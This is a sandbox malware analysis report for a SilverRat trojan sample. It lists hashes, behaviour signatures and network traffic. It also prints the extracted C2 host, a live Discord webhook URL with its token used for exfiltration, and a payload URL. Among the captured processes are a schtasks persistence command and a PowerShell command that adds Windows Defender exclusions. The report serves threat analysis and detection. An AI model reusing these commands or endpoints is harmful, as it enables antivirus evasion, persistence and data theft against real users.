Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

SilverClient.exe

windows7-x64

10

SilverClient.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    296s
  • max time network
    300s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24/12/2024, 13:28 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SilverClient.exe

  • Size

    41KB

  • MD5

    3952e9916c90e897f360c6a30467d862

  • SHA1

    860e5ce37398db429528ad2b5f96a3005c65f800

  • SHA256

    2da1d2b5a84b7124e6a121545e2a113c6fd3176ff6d97e555c422f6cdc9b96db

  • SHA512

    43525046bb5601991e18d59922790da01e378102f74bf970c07013f312a7309c146994117dcc35e000c3874dfacd4eefc6c68937800a41555279dafaae02d021

  • SSDEEP

    768:ZpDZ3iKNWP3In15M8w+HR9m1xRUHE9wVdzmgotSB6S/uQ8QrnxUFU:ZpMQQF+xeGk9Ng7oouQ8QxUFU

Score
10/10
silverratexecutiontrojan

Malware Config

Extracted

Family

silverrat

Version

1.0.0.0

C2

japanese-cross.gl.at.ply.gg:5544

Mutex

SilverMutex_jafRtepbDn

Attributes
  • certificate

    MIIE4DCCAsigAwIBAgIQAKQYOfZd86J2BfNjhG4CWTANBgkqhkiG9w0BAQ0FADARMQ8wDQYDVQQDDAZTaWx2ZXIwIBcNMjIwODI2MTkwMTA4WhgPOTk5OTEyMzEyMzU5NTlaMBExDzANBgNVBAMMBlNpbHZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAPbpOWfhZTuOfEaqqImTTe5dNHAAry7/mf00DCoI4lPZfypsc1tYraxSPFeayGu09a3qdhkWKSVIgwnu2n4GLQNOCY9fh/1oyrX4Iir3BIkYeU7pKTWgjhUlAmFAUAaNr0ca23Ku2kN79jrDzRznOgE2DEW4p7OiM4Mb097ma9lzu7MyssHbY4VCteAhj9HZiplqBxaC1vXDmzxqG+gUZ1aLcyG7ssdkOjtWVBgT3gD/gOl7KchRzCFB1egDC/vD9WZCG35U3Ngi+IkTznoXR1R06cq4v0UnGjE37R2vcB21qb0ZYNiZJXZHv5i9+R7xoPeNoLda5PqnfGGbhPvNEdD56mdcOKlzGIuyemLkUo8texdpiBWKbtc3JZf5VsKxjJtHDK3xW6gDGI+PAirzGkFPmwcf8WgsblvzLg8OZpVxVs8rmKWoi6qIrf4CXnyl73J4lgzW+ir7PjANAQXwLNGdNnvdMeLeo/muGQPdeNpr6OczGGnkWA4qniHeL51/Gx0a8A+jP9zKiyu+qHcsP2IotgWDH/KlzJVr7IAum+DV92uV8poTDcUNcHaKvhHA65KmEtsvLbK6lFZcAMC0eWC0VgpW44T1/16rOaaky5mP6rTMc3nSyOl/lU/XgAgGGQPe22bRLWYzd3WVeEpI1WnHYXS+tL9IOe4kJP+pYsWDAgMBAAGjMjAwMB0GA1UdDgQWBBR32TJj2LeUx9L+RcSOvmFV6VJq6TAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQA+qucSOi7ov7Q1FmAjMf925KuvKuCNwJiu3Sqo3FDGVAD1fAwAi2FdyuXEO2VIUPZCkalFcBna5rqyrc6tcS4T0IL2TsYLrsuGir7PWP7CAcft1urYS1HpNpHxeH/nixwnQaQs/MuRmdm2TeCj6G21P5BTW55U5y9sMPSYwhbD2N7XLgnSQd5Y+80TR7FUiye/k3D37fI9PRhSQGbfYFRQQTmxj84dPTnY5CVgaY9d8fNiFZkyjaZdf+mibK0xQTf+xLVVj+toDNCkc1F462TdmFhCrHd4PoMo0yLDNv4SC6NLRq4haWDRtORw6gd5GYIoCQ3m3oQvNlNxXhhIjsOyxkxOrkCD0c+57PIc7EmKXieJa/XxnkcIVxO8dvTY/vijuz/VaZYl/lPu9ckuqgJ1wRvvsHl70Trv4Mn4X5uCIqRFFlK/mSOZbLIguGkDN3QIZABvej89vlZMhrVfZOG2oawe23FskHjv7thF/WzOXtWw6RUVC1V+hCwbuxFNUjZmmOTUwdXHnus7I2AuiG6Jz1+y9aYiXBcVTdSljxjHRRmiRaAnY94h58vN8NJ4hKL2GVCo6LxkpuplmcntJN0cKraKTPxSXcCRrqWxX9qoIbfvBcUU4vH1jPJCCLNCuDyD3lgQkpPVvq0EMU1a2HFGgMEQMjpYpb38rcadDhT5ag==

  • decrypted_key

    -|S.S.S|-

  • discord

    https://discord.com/api/webhooks/1321105847064989729/ZxyszSatMIHTaGAl4BDIJjfWgDi3NYjS9MKji0deomNAJsyovtZj3obV9ncoMRVjdmqc

  • key

    yy6zDjAUmbB09pKvo5Hhug==

  • key_x509

    ZEdBaGFTUkx2U3pvY0RSQ0J5dHNpUlVOVGNQbUF3

  • payload_url

    https://g.top4top.io/p_2522c7w8u1.png

  • reconnect_delay

    4

  • server_signature

    YFe9bEQ8wbHo4adINlvWOheLnVlB1/9fyx2fEkOAr/TmMCZ6+XX2riX/hrN8ObiwroghpMOKwOoOX/KFwTO522esiQXYMskfoXnNKiN7rXWDJ8jigLBX444gXCL/J1y/fhyq5aI2hYy3yb9kjK2PiM9cFt6uI/nYRVr48d0KKq1+qPtq/wU9bnzuKeoRVLYwXUjRhPM6wJrQt0TP0W4BzsAaAVUBkjWTXnPg7t8zWct8sMxD52CpcOtm5UqImdRLoXd+b9OhJnwjEdEqGJ2cnM08YsINWClmFaUNkTe4aRYQXgTOPwBEe8XQuyx6Zuwv2ufTarY6okG/JLFe3POFBdN3DEFV+ye1if+XktEsH/dCYZJB6q6NErb9hlwSe16HiG321WetlE9LZfAsRVxrU1VhyOqEwR+lQHz98HdpQeBC4qdoO7ps9dKTwgO8Cl8JimRo2NN06HPI3hrB0/zwazsuZF+Ahen9u0rHHRVFkaDKshZ0R1pbx1ypcYrReemrhFbwkeoapc58L93j5fV08+uC4KXYs6O8RAAqFIIRNQgscT1PjhC6gMTWyknt4gOfNhQG51O1C6oRKtf0sTBt/bidlffLlaYIAqrn/YLDWekGM+IGqhGpg/y8SEfjeD5nYc+AzqFWwkpwg8OUb8iAy4g4IGEpAHy0HDfbA2Vp4TQ=

Signatures

  • SilverRat

    SilverRat is trojan written in C#.

    trojansilverrat
  • Silverrat family
    silverrat
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\SilverClient.exe
    "C:\Users\Admin\AppData\Local\Temp\SilverClient.exe"
    1⤵
    • Checks computer location settings
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2204
    • C:\Windows\SYSTEM32\schtasks.exe
      "schtasks.exe" /query /TN SilverClient.exe
      2⤵
        PID:3620
      • C:\Windows\SYSTEM32\schtasks.exe
        "schtasks.exe" /Create /SC ONCE /TN "SilverClient.exe" /TR "C:\Users\Admin\AppData\Local\Temp\SilverClient.exe \"\SilverClient.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST
        2⤵
        • Scheduled Task/Job: Scheduled Task
        PID:4708
      • C:\Windows\SYSTEM32\schtasks.exe
        "schtasks.exe" /query /TN SilverClient.exe
        2⤵
          PID:1272
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3848

      Network

      • flag-us
        DNS
        discord.com
        SilverClient.exe
        Remote address:
        8.8.8.8:53
        Request
        discord.com
        IN A
        Response
        discord.com
        IN A
        162.159.137.232
        discord.com
        IN A
        162.159.128.233
        discord.com
        IN A
        162.159.138.232
        discord.com
        IN A
        162.159.135.232
        discord.com
        IN A
        162.159.136.232
      • flag-us
        POST
        https://discord.com/api/webhooks/1321105847064989729/ZxyszSatMIHTaGAl4BDIJjfWgDi3NYjS9MKji0deomNAJsyovtZj3obV9ncoMRVjdmqc
        SilverClient.exe
        Remote address:
        162.159.137.232:443
        Request
        POST /api/webhooks/1321105847064989729/ZxyszSatMIHTaGAl4BDIJjfWgDi3NYjS9MKji0deomNAJsyovtZj3obV9ncoMRVjdmqc HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        Host: discord.com
        Content-Length: 425
        Expect: 100-continue
        Connection: Keep-Alive
        Response
        HTTP/1.1 204 No Content
        Date: Tue, 24 Dec 2024 13:28:12 GMT
        Content-Type: text/html; charset=utf-8
        Connection: keep-alive
        Set-Cookie: __dcfduid=ec9f0b42c1fa11efba0606cb2c553994; Expires=Sun, 23-Dec-2029 13:28:12 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
        x-ratelimit-limit: 5
        x-ratelimit-remaining: 4
        x-ratelimit-reset: 1735046894
        x-ratelimit-reset-after: 1
        via: 1.1 google
        alt-svc: h3=":443"; ma=86400
        CF-Cache-Status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7HBHA9raZNZJoB2SM%2F1Lh2AD8UtmCu02ygoi0THfwhxx2UNAxo1VI6MZe23r%2BaJn9fRLxZcSJHFQxH49qFqXvwuDnYJm4PIj%2BhWGK3v929V2DXf6rC823fEB8wx4"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        X-Content-Type-Options: nosniff
        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
        Set-Cookie: __sdcfduid=ec9f0b42c1fa11efba0606cb2c553994b5ddfa76de555a321a8720994eaf23926af55e450b9fa70d9c525ab94e3d2985; Expires=Sun, 23-Dec-2029 13:28:12 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
        Set-Cookie: __cfruid=6dc3e1bb4fa8d57bc5897d2941085c51d2f9f2a1-1735046892; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Set-Cookie: _cfuvid=16ZmfOzuOmmxdRMgaBiyso4o4uEKUXx4A9c3912NpTk-1735046892805-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Server: cloudflare
        CF-RAY: 8f70eee6de56cd5c-LHR
      • flag-us
        DNS
        japanese-cross.gl.at.ply.gg
        SilverClient.exe
        Remote address:
        8.8.8.8:53
        Request
        japanese-cross.gl.at.ply.gg
        IN A
        Response
        japanese-cross.gl.at.ply.gg
        IN A
        147.185.221.24
      • flag-us
        DNS
        154.239.44.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        154.239.44.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        232.137.159.162.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        232.137.159.162.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        172.214.232.199.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        172.214.232.199.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        22.160.190.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        22.160.190.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        95.221.229.192.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        95.221.229.192.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        58.55.71.13.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        58.55.71.13.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        53.210.109.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        53.210.109.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        198.187.3.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        198.187.3.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        198.187.3.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        198.187.3.20.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        134.71.91.104.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        134.71.91.104.in-addr.arpa
        IN PTR
        Response
        134.71.91.104.in-addr.arpa
        IN PTR
        a104-91-71-134deploystaticakamaitechnologiescom
      • flag-us
        DNS
        43.229.111.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        43.229.111.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        26.73.42.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        26.73.42.20.in-addr.arpa
        IN PTR
        Response
      • 162.159.137.232:443
        https://discord.com/api/webhooks/1321105847064989729/ZxyszSatMIHTaGAl4BDIJjfWgDi3NYjS9MKji0deomNAJsyovtZj3obV9ncoMRVjdmqc
        tls, http
        SilverClient.exe
        1.5kB
         5.2kB
         11
        12

        HTTP Request

        POST https://discord.com/api/webhooks/1321105847064989729/ZxyszSatMIHTaGAl4BDIJjfWgDi3NYjS9MKji0deomNAJsyovtZj3obV9ncoMRVjdmqc

        HTTP Response

        204
      • 147.185.221.24:5544
        japanese-cross.gl.at.ply.gg
        SilverClient.exe
        260 B
         5
      • 147.185.221.24:5544
        japanese-cross.gl.at.ply.gg
        SilverClient.exe
        260 B
         5
      • 147.185.221.24:5544
        japanese-cross.gl.at.ply.gg
        SilverClient.exe
        260 B
         5
      • 147.185.221.24:5544
        japanese-cross.gl.at.ply.gg
        SilverClient.exe
        260 B
         5
      • 147.185.221.24:5544
        japanese-cross.gl.at.ply.gg
        SilverClient.exe
        260 B
         5
      • 147.185.221.24:5544
        japanese-cross.gl.at.ply.gg
        SilverClient.exe
        260 B
         5
      • 147.185.221.24:5544
        japanese-cross.gl.at.ply.gg
        SilverClient.exe
        260 B
         5
      • 147.185.221.24:5544
        japanese-cross.gl.at.ply.gg
        SilverClient.exe
        260 B
         5
      • 147.185.221.24:5544
        japanese-cross.gl.at.ply.gg
        SilverClient.exe
        260 B
         5
      • 147.185.221.24:5544
        japanese-cross.gl.at.ply.gg
        SilverClient.exe
        260 B
         5
      • 147.185.221.24:5544
        japanese-cross.gl.at.ply.gg
        SilverClient.exe
        260 B
         5
      • 147.185.221.24:5544
        japanese-cross.gl.at.ply.gg
        SilverClient.exe
        260 B
         5
      • 147.185.221.24:5544
        japanese-cross.gl.at.ply.gg
        SilverClient.exe
        260 B
         5
      • 147.185.221.24:5544
        japanese-cross.gl.at.ply.gg
        SilverClient.exe
        260 B
         5
      • 147.185.221.24:5544
        japanese-cross.gl.at.ply.gg
        SilverClient.exe
        156 B
         3
      • 8.8.8.8:53
        discord.com
        dns
        SilverClient.exe
        57 B
         137 B
         1
        1

        DNS Request

        discord.com

        DNS Response

        162.159.137.232
        162.159.128.233
        162.159.138.232
        162.159.135.232
        162.159.136.232

      • 8.8.8.8:53
        japanese-cross.gl.at.ply.gg
        dns
        SilverClient.exe
        73 B
         89 B
         1
        1

        DNS Request

        japanese-cross.gl.at.ply.gg

        DNS Response

        147.185.221.24

      • 8.8.8.8:53
        154.239.44.20.in-addr.arpa
        dns
        72 B
         158 B
         1
        1

        DNS Request

        154.239.44.20.in-addr.arpa

      • 8.8.8.8:53
        232.137.159.162.in-addr.arpa
        dns
        74 B
         136 B
         1
        1

        DNS Request

        232.137.159.162.in-addr.arpa

      • 8.8.8.8:53
        172.214.232.199.in-addr.arpa
        dns
        74 B
         128 B
         1
        1

        DNS Request

        172.214.232.199.in-addr.arpa

      • 8.8.8.8:53
        22.160.190.20.in-addr.arpa
        dns
        72 B
         158 B
         1
        1

        DNS Request

        22.160.190.20.in-addr.arpa

      • 8.8.8.8:53
        95.221.229.192.in-addr.arpa
        dns
        73 B
         144 B
         1
        1

        DNS Request

        95.221.229.192.in-addr.arpa

      • 8.8.8.8:53
        58.55.71.13.in-addr.arpa
        dns
        70 B
         144 B
         1
        1

        DNS Request

        58.55.71.13.in-addr.arpa

      • 8.8.8.8:53
        53.210.109.20.in-addr.arpa
        dns
        72 B
         158 B
         1
        1

        DNS Request

        53.210.109.20.in-addr.arpa

      • 8.8.8.8:53
        198.187.3.20.in-addr.arpa
        dns
        142 B
         157 B
         2
        1

        DNS Request

        198.187.3.20.in-addr.arpa

        DNS Request

        198.187.3.20.in-addr.arpa

      • 8.8.8.8:53
        134.71.91.104.in-addr.arpa
        dns
        72 B
         137 B
         1
        1

        DNS Request

        134.71.91.104.in-addr.arpa

      • 8.8.8.8:53
        43.229.111.52.in-addr.arpa
        dns
        72 B
         158 B
         1
        1

        DNS Request

        43.229.111.52.in-addr.arpa

      • 8.8.8.8:53
        26.73.42.20.in-addr.arpa
        dns
        70 B
         156 B
         1
        1

        DNS Request

        26.73.42.20.in-addr.arpa

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rhsgv1og.vzx.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • memory/2204-0-0x00007FFFFBD73000-0x00007FFFFBD75000-memory.dmp

        Filesize

        8KB

        Download

      • memory/2204-1-0x0000000000BD0000-0x0000000000BDE000-memory.dmp

        Filesize

        56KB

        Download

      • memory/2204-2-0x00007FFFFBD70000-0x00007FFFFC831000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2204-15-0x00007FFFFBD73000-0x00007FFFFBD75000-memory.dmp

        Filesize

        8KB

        Download

      • memory/2204-16-0x00007FFFFBD70000-0x00007FFFFC831000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3848-8-0x00000199FB400000-0x00000199FB422000-memory.dmp

        Filesize

        136KB

        Download

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.